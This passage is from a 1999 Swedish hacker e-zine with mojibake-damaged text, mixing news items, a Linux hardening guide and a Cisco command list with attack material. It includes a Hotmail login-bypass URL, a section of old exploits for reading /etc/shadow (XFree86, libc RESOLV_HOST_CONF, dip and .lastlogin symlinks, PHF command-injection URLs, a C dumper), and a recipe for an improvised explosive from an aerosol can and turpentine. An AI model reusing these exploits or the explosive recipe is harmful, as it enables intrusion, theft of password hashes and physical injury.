pl<70>tbitar p<> beige linan och stoppar in tv<74> h<>l. S<>d<EFBFBD>r ja! nu har du l<>rt dej
hur man beigar fr<66>n vitingar.
// dThl
[Knash fyller i: Finns p<> bild p<> adapter p<>:
http://members.xoom.com/firecrew/pics/vit.jpg]
-----------------------------------------------------------------------------
Polisen tvingar telebolagen, arghh
-----------------------------------------------------------------------------
Farbror bl<62> suger stock ! klart att det alltid finns en v<>g ut men nu ska
snuten f<>rs<72>mra f<>r oss, dom tvingar Telebolagen att dom ocks<6B> ska kunna ha
access till att avlyssna krypterade samtal och f<> fram klartext. Det ska
allts<74> finnas en massa on<6F>dig h<>rdvara och program f<>r att f<> encrypted till
cleartext, uurk. P<> riksdagens fula bord ligger det redan ett fult lagf<67>rslag
(proposition 1994/95:227) om <20>ndring av r<>tteg<65>ngsbalken) .....det b<>rjar bli
sorgligt nu. J<>j<EFBFBD>, vi kan v<>l skaffa en algoritm som <20>r om<6F>jlig att forcera.
Men hur l<>ng tid kommer det ta ? ..och hur m<>nga fattar s<> mycket att de kan
va med ? inte speciellt m<>nga, inte heller jag...Nu pallar inte jag mer arti-
keln e slut kanske.
-----------------------------------------------------------------------------
msg'a kanalen du <20>r bannad p<>
-----------------------------------------------------------------------------
Jag satt och plinkade p<> IRC och diskuterade p<> #Nuke.se hur allvarligt DoS
egentligen <20>r, n<>....men de enda intressanta med DoS <20>r hur det funkar...
TCP/IP, UDP osv. <20>r ju inte byggda f<>r att kunna krasha andra hosts. Sen blev
jag ju bannad s<>klart sen testade jag skriva /msg #nuke.se nuke l337s...jao
och det funkade, vetta fan om det <20>r inbyggt eller om det <20>r en bug. L<>t oss
s<>ga att det <20>r en bug, mkt roligare s<>. Ja men vi synns p<> #2,000. Hmm, l<>g-
ger till lite p<> artikeln efter som <20>r m<>rkt lite saker. Detta kallas f<>r
External Message och fungerar bara om kanalen har satt +n (No external Messa-
ges)
Sen blir man ju tvingad att tacka Bhunji som gav f<>rslag p<> topicen, ville
inte l<>ta de se l<>jligt ut, BL<42><4C><EFBFBD>.
-----------------------------------------------------------------------------
Vem som helst kan l<>sa din Hotmejl
-----------------------------------------------------------------------------
Jo som vanligt s<> <20>r ju Microsoft inga s<>kerhets experter. <20>nnu ett liten
lucka i Hotmails system. Du kan l<>sa vem som helsts account och det <20>r ju
lamt men andv<64>ndbart, m<>nga miljoner andv<64>nder hotmail och ofta skickas
mail med passwds till ditt nya t.ex. X00M konto.
Connecta bara till:
http://207.82.250.251/cgi-bin/start?curmbox=ACTIVE&js=no&login=USERNAME&passwd=eh
Med din favorit HTTP klient. Observera att USERNAME byts ut mot valfritt
username ;)
Detta funkade dock inte l<>nge, redan fixat. Men s<> ni vet vad h<>let va. <20>r d-
et n<>gon som tekniskt vet hur bakd<6B>rren funkade s<> kan ni skicka en j<>vel
till mig p<> keytrace@usa.net.
-----------------------------------------------------------------------------
0ldschool Hacking: /etc/shadow
-----------------------------------------------------------------------------
[F<>rord]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Jag t<>nke f<>rklara ett par gamla godingar, allts<74> olika tekniker f<>r att kun-
na rycka <20>t sig /etc/shadow. Jag vill inte ha en massa klagom<6F>l p<> denna
artikel, den <20>r ju inte direkt f<>r avancerad och det <20>r ju inte jag heller =)
[XFREE86]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Detta ska funka p<> de flesta *nix system som k<>r XFREE86 och utf<74>rs med:
XF86_SVGA -config /etc/shadow
Om det inte <20>r Fredag den 13 och du inte har f<>tt ditt dagliga r<>vknull av
far din s<> ska /etc/shadow ge utdata p<> terminalen.
[H<>l i libc 5.4.7]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Jao, i de flesta *nix systemen ska det ocks<6B> finnas ett "Security hole" i
libc 5.4.7 som l<>ter dig s<>tta resolv_hots_conf till vilken fil som helst. Om
du kan k<>ra ett SUID program som andv<64>nder resolv_host_conf typ ping, tracer-
oute, ssh, rlogin. Om du nu t.ex. andv<64>nder ping s<> ska ping ge /etc/shadow
som utdata p<> terminalen.
1. Skriv bash f<>r att starta bash skalet.
2. Skriv export RESOLV_HOST_CONF=/etc/shadow
3. Skriv ett av fil namnen ovan med asdf, t.ex. ping asdf
[Rycka /etc/shadow med dip]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
En del Linux Slackware burkar kan du andv<64>nda dip f<>r att exploita root, den
kan ocks<6B> andv<64>ndas f<>r att rycka <20>t sig /etc/shadow.
ln -s /etc/shadow /tmp/buh.dip /sbin.dip -v /tmp/buh.dip
[Gammalt .lastlogin trick]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Sen finns det ett gammalt SCO och Sys V .lastlogin trick. Kolla s<> att .las-
tlogin i ditt hem bibliotek s<> att den <20>gs av root eller auth
rm -f ~rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd
Logga nu ut och logga in igen s<> du kan skapa l<>nken.
cat .lastlogin > passwd
rm -f ~/.lastlogin
[ypcat p<> m<>glande Unix system]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Sen kan du alltid testa ypcat /etc/passwd som kan funka p<> s<>nderm<72>glade
Unix system.
[PHF <20>r en historia]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Egentligen t<>nke jag inte ta med PHF eftersom det <20>r s<>nderm<72>glad och att
det inte finns n<>n server som har PHF h<>let. Men det finns faktiskt gamla
Asiatiska system d<>r PHF fortfarnande funkar.
http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd
eller kanske...
http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd
[Unshadow .c script]
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Kan funka p<> en del *nix versioner som <20>r gamla som gatan.
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
K<>lla: shadow.txt
Detta borde l<>sas av allas petiga typer!
All information i artikeln <20>r inte helt
skrivet med egna ord. S<> kom inte och
klaga p<> att texten <20>r likt de engelska
orginalet.
-----------------------------------------------------------------------------
Linux S<>kerhet Administration
-----------------------------------------------------------------------------
Jag <20>r relativt ny p<> Linux och blev sugen att skriva lite om s<>kerhet n<>r
jag grubblade igenom axxezz's artikel i SuZ om Linux security. S<> jag hade
t<>nk f<>rklara enkelt om s<>kerhet i olika dist o unix system i allm<6C>nnhet.
Jag kommer h<>lla mig till 2 vanliga dist, ulmhhh...Redhat och Slackware.
F<>r er som inte orkar lusa igenom allt f<>r att veta vad artikeln inneh<65>ller
s<> kan jag ber<65>tta det redan nu ;) ...Password Policy, Password Shadowing,
TCP Wrappers, Anonymous FTP, 0nda services och Loggfiler.
[Password Policy]
Nej nu ska jag inte ta upp n<>t j<>vla shit om hur man v<>ljer r<>tt l<>senord
som varenda pc tidning p<> markaden skriver om eller har skrivit om, jag bryr
mig inte om vilka som andv<64>nder bra l<>senord eller inte, det skapar bara f<>r-
delar f<>r omgivninge. Men jag ska d<>remot ta upp hur man f<>r systeme t att
inte till<6C>ta passwd under 8 tecken osv. Detta <20>r dock mest andv<64>ndbart f<>r
admin p<> n<>n skola. Men det kan va kul att veta <20>n d<>.
I Slackware s<> <20>ppnar du /etc/login.defs med en sk<73>n text-editor. De t f<>rsta
du ska kolla <20>r om LOG_OK_LOGINS <20>r satta p<> yes, sen kan du s<>tta
ENABLE_MD5_CRYPT p<> yes (kryptering <20>r ju bra i alla fall, om det inte <20>r
en fel programmerad f<>rst<73>rande algoritm :I) Om du vill kunna andv<64>nda
passwd <20>ver 8 tecken s<> kan du <20>ndra v<>rderna p<> variblerna PASS_MAX_DAYS,
PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till n<>gra l<>mpliga v<>rden.
I Redhat s<> <20>ppnar du ocks<6B> /etc/login.defs och s<>tter variblerna
PASS_MAX_DAYS, PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till det som
k<>nns r<>tt. Skilladen mellan konfigurationen i Slackware och Redhat <20>r n<>stan
ingen, configurationen om man vill andv<64>nda MD5 g<>rs det i login.defs om man
andv<64>nder Slackware, det configueras vid installation i Redhat. MD5 <20>r en
one-way algoritm som menas att den aldrig kan dekrypteras, algoritmen <20>r inte
hemligt s<> det som beh<65>vs <20>r att skriva ett program som krypterar fr<66>n en
ordlista och g<>mnf<6E>r med de krypterade passwd:et i /etc/passwd eller i
/etc/shadow som <20>r en standardisering f<>r nya Linux system, /etc/shadow kan
dock inte n<>s av andra andv<64>ndare, men det finns tekniker s<> att man kan
rycka <20>t sig en skuggad passwd fil. Mer om Password Shadowing ses nedan.
[Password Shadowing]
Det f<>rsta du ska kolla <20>r att /etc/shadow finns, om inte s<> har du valt vid
installationen att inte andv<64>nda password shadowing och d<> f<>r du k<>ra
pkgtool och installera de sj<73>lv. N<>r du installerat pkgtool s<> f<>ru k<>ra
kommandona /usr/sbin/pwconv och /usr/sbin/grpconv.
[TCP Wrappers]
Note: Konfigurationen av TCP Wrappers <20>r samma i alla dist.
F<>r det f<>rsta m<>ste du veta vad en TCP Wrapper <20>r f<>r n<>t annars <20>r det
inte s<> bra, !LOL! jaja, en TCP Wrapper andv<64>nds f<>r att kunna styra vilka
datorer som f<>r andv<64>nda vilka tj<74>nster. Detta finns definerat i
/etc/inetd.conf. Det finns tv<74> filer som styr detta och det <20>r
/etc/hosts.deny och /etc/hosts.allow. F<>rst ska jag g<> igenom hur man l<>ser
datorn f<>r alla utom ett antal IP nummer. F<>rsta steget <20>r att <20>ppna
/etc/hosts.deny och skriva in raden ALL: ALL. F<>r att st<73>lla in vilka som
f<>r komma <20>t din dator editerar du /etc/hosts.allow och skriver in t.ex.
ALL: 10.13.95.03. Ist<73>llet f<>r ALL s<> kan man skriva in t.ex. en pop3 server
eller in.telnetd, t.ex. in.telnet.d: 10.13.95.03 eller pop3.ondska.org: IP.
detta. Detta begr<67>nsar allts<74> vilka som f<>r logga in p<> systemet och vilka
som f<>r l<>sa sin epost. Du kan ocks<6B> blockera olika IP-nummer men sen till<6C>-
ta alla andra. Det g<>r du i /etc/hosts.deny. Editera hosts.deny och skriv
t.ex:
ALL: .hostname.com
ALL: ipnummer
[Anonymous FTP]
Som standard <20>r Anonym FTP p<>slagen efter installation. Om du tycker det <20>r
l<>skigt att vem som helst kan logga in som anonymous. Vilka som inte f<>r
logga in anges i /etc/ftpusers. <20>ppna bara /etc/ftpusers med emacs, vi, pico
eller vad fan du vill och l<>gg till raderna anonymous och ftp.
[0nda services]
Det finns m<>nga services i Linux som skapar m<>jligheter, f<>r att g<>ra ditt
system en aning s<>krare s<> editerar du /etc/inetd.conf och s<>tter # framf<6D>r
alla l<>skiga tj<74>nster.
Slackware.
F<>r det f<>rsta ska du studera indetd.conf noga och fundera vad datorn ska
andv<64>ndas till och sen st<73>nga av alla on<6F>diga tj<74>nster. Finger, shell, login,
ntalk, systat och netstat b<>r st<73>ngas av och om du andv<64>nder en <20>ldre version
av Slackware s<> <20>r det ocks<6B> bra att st<73>nga av imapd som va os<6F>ker. Telnet
och ftp ska man ta och t<>nka lite om dom ska va p<> eller av, eftersom passwd
skickas i klartext och kan enkelt sniffas. Om de verkligen absolut m<>ste and-
v<>ndas..kolla s<> att du alltid h<>ller den uppdaterad till senaste versionen.
SSH (ftp.sunet.se/pub/security/tools/net) eller Kerberos (http://www.pdc.kth-
.se/kth-krb) <20>r iofs ett b<>ttre alternativ eftersom allt krypteras vid <20>verf-
<20>ringen. Om du inte fattade hur man st<73>nde av en tj<74>nst s<> ber<65>ttar jag igen,
s<>tt en # framf<6D>r den tj<74>nst du vill st<73>nga av och k<>r killall -HUP inetd f<>r
att uppdatera konfigurationen. <20>ven /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 b<>r
unders<72>kas d<>r du kan st<73>nga av olika tj<74>nster.
Redhat.
/etc/inetd.conf har samma uppgift som i Slackware.
att uppdatera konfigurationen. <20>ven /etc/rc.d/rc.M och /etc/rc.d/rc.inet2 b<>r
Gopher, shell, login, talk, ntalk, pop-2, pop-3. finger, time, linuxconf,
imapd. Om du vill andv<64>nda pop-3 och imapd s<> se till att du uppgraderar till
den senaste versionen. Som jag sa f<>rut s<> skickar telnet o ftp passwdn i
klartext, s<> om du vill andv<64>nda dem s<> <20>r det b<>st att andv<64>nda Secure Shell
(SSH) eller Kerberos. Du st<73>nger av tj<74>nsterna genom att s<>tta en kommentar
(#) framf<6D>r dem och du uppdaterar inetd med killall -HUP inetd. F<>r att st<73>n-
ga av andra on<6F>diga tj<74>nster k<>r /usr/sbin/setup och g<> in p<> ntsysv. St<53>ng
av allt som inte <20>r n<>dv<64>ndigt och f<>r att f<> information om de olika tj<74>nst-
erna s<> e det bara att trycka F1.
[Loggfiler]
Det enda s<>ttet att kolla vad som h<>nder p<> din dator s<> <20>r det att kolla
loggarna, visserligen finns det scripts som kan rensa dem men det <20>r st<73>rre
chans att se vad som h<>nder eller hinna det innan dom blir rensade om du kol-
lar dom som en vana. I slackware ligger loggarna /var/log/messages och
/var/log/syslog. Ge kommandot last dagligen ocks<6B> f<>r att kolla vilka som
loggat in p<> datorn.
I Redhat ligger loggarna i /var/log/messages och /var/log/secure, sen e de
ocks<6B> en bra ide att kolla vilka som loggat in p<> datorn med kommandot last.
Det finns program som kan unders<72>ka loggarna automatiskt, s<>nna kan man hitta
p<> http://www.alw.nih.gov/Security/prog-monitor.html (Swatch och logsurfer)
[Efterord]
Jag vet att detta inte va den b<>sta artikeln, men information <20>r alltid
information. Om du undrar n<>t eller vill ge credits (LOL) s<> maila keytrace@-
usa.net
-----------------------------------------------------------------------------
Cisco kommando lista
-----------------------------------------------------------------------------
<1-99> - Session number to resume
access-enable - Create a Temporary Access-List
access-profile - Apply user-profile to interface
clear - Reset functions
connect - Open a terminal connection
disable - Turn off privileged commands
disconnect - Disconnect an existing network connection
enable - Turn on privileged commands
exit - Exit from the EXEC
help - Description of the interactive help system
lock - Lock the terminal
Login - Login as an particular user
logout - Same as 'exit'
mrinfo - Request neighbor and version information from a multicast router
mstat - Show statistics after multiple multicast tracerouter
mtrace - Trace revers multicast path from destination to source
name - connection - Name an existing network connection
pad - Open a X.29 PAD connection
ping - Send echo messages
ppp - Start IETF point-to-point protocol (PPP)
resume - Resume an active network connection
rlogin - Open a rlogin connection
show - Show running system information
slip - Start serial-line (SLIP)
systat - Display information about terminal lines
telnet - Open a telnet connection
terminal - Set terminal line parameters
traceroute - Trace route to destination
tunnel - Open a tunnel connection
where - List active connections
x28 - Become an x28 PAD
x3 - Set x3 parameters on PAD
-----------------------------------------------------------------------------
Ethernet kort till Windows CE
-----------------------------------------------------------------------------
Xirom har kommit ut med ett litet batterisn<73>lt Ethernet kort till Windows CE
burkar. CompactCard Ethernet 10 so kortet heter <20>r bara h<>lften s<> liten som
ett vanligt PC kort och du kan ansluta dig med 10Mbps och kostar endast och
j<>tte bara 1 255:- (exkl. moms) ..n<>, mer <20>n min veckopeng. Jag tror att man
kan k<>pa den p<> ICA, fast kanske inte.
http://www.xircom.com/compactcard/images/cfe-tr.gif
http://www.xircom.com/compactcard/images/cfe-123.jpg
http://www.xircom.com/compactcard/images/cfe-123.jpg
-----------------------------------------------------------------------------
Svenska hackers hackade NASA, busted !
-----------------------------------------------------------------------------
2 Svenska hackers gripna f<>r intr<74>ng i NASAS j<>tte mega hemliga datorer. De
tv<74> ungdomarna h<>ll till i en L<>genhet p<> S<>der d<>r allt kretsade kring dato-
rn. En av dom ber<65>ttade att ta sig in i datorer va som en drog. Dom har bla.
kommit <20>ver hemliga s<>kerhets listor och riskerar nu 2 <20>rs f<>ngelse och
skadest<73>nd.
*s<>rja*
-----------------------------------------------------------------------------
Svin l<>tt & rolig Bomb
-----------------------------------------------------------------------------
Ok, h<>r kommer ett recept p<> en t<>mligen l<>tt bomb, det finns s<>kert andra
versioner och former av denna bomb i andra zines. men h<>r kommer den iaf:
Vad du beh<65>ver:
1st Axe/h<>rspray/adidas liknande spray flaska.
<20> flaska terpentin eller annan l<>ngbrinnade&l<>tt ant<6E>ndlig v<>tska
T<>ndare/T<>ndstickor.
Hur du g<>r:
H<>ll lite terpentin p<> marken och l<>gg sedan burken p<> terpentin v<>tskan,
h<>ll nu p<> resten av terpentin flaskan <20>ver spray burken, j<>rna lite runtom
ox<6F>. T<>nd p<> och stick iv<69>g ca 10-15meter.
Effekt:
F<>rst n<>r terpentinet har tagit eld och brunnit mellan 1-3 minuter s<> kommer
en liten knall som oftast f<>ljs av en till knall och sedan explosionen som
brukar vara ca 5ggr h<>gre <20>n knallarna, n<>r explosionen kommer s<> blir det
som ett typ svampmoln av eld ( typ atombomb ) som str<74>cker sej ca 1<>-2 meter
upp i luften. T<>nk p<> att inte s<> f<>r n<>ra burken, f<>r den kommer flyga i
m<>nga delar, och terpentinet som ligger p<> kommer b<>rja brinna p<> st<73>llet d<>r
burk flisorna landar. Vi gjorde denna bomb i skogen, det blev en grop i
marken ca 10-15cm djup och fl<66>ckar med aska <20>ver allt inom 5-10 meters radie.
Var hittar jag grejorna:
Terpentin: f<>rghandel, vissa mat aff<66>rer.
Spray Flaska: T<>nk sj<73>lv ;)
T<>ndare: Sno fr<66>n din kedjer<65>kande mamma eller i aff<66>ren.
//dthl
-----------------------------------------------------------------------------
Copyright
-----------------------------------------------------------------------------
Zinet f<>r skickas <20>ver alla protokoll s<> l<>nge du INTE <20>ndrar det. Jag har
satt en fet 1337 copyright p<> detta zine.
Heretics Inc., Outlaw Informativa (C)
-----------------------------------------------------------------------------
3x1t3d(), eller n<>t
-----------------------------------------------------------------------------
Jopp, s<> va sagan slut som dom sa p<> Bj<42>rnes Magazine. Jag hoppas att du inte
s<>rjer. T<>nk som min gamla farfar gjorde "0ndska <20>r K<>rlek" min farfar va en
0nd j<>vel. Nej !!! ...Slut p<> skitsnacket, ta ut snusen och g<> och d<> och
sluta lyssna p<> mina d<>liga sk<73>mt.
# cat /ezine/o-i/outlaw-07 > /etc/shadow
And the story ends...
.-------------------------------------------------------------------------.
| Heretics Inc. Outlaw Informativa issue #7, 22:45 1999-09-08 |
'-------------------------------------------------------------------------'
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.0.2i
iQA/AwUBN5zSsnRmgGlPBhFaEQLQngCgjAdjJAjiAqYXs9YTnGFjd0/VaXYAnj+Q
X3pmKDomoNWBQp8LyYIdwbqm
=estT
-----END PGP SIGNATURE-----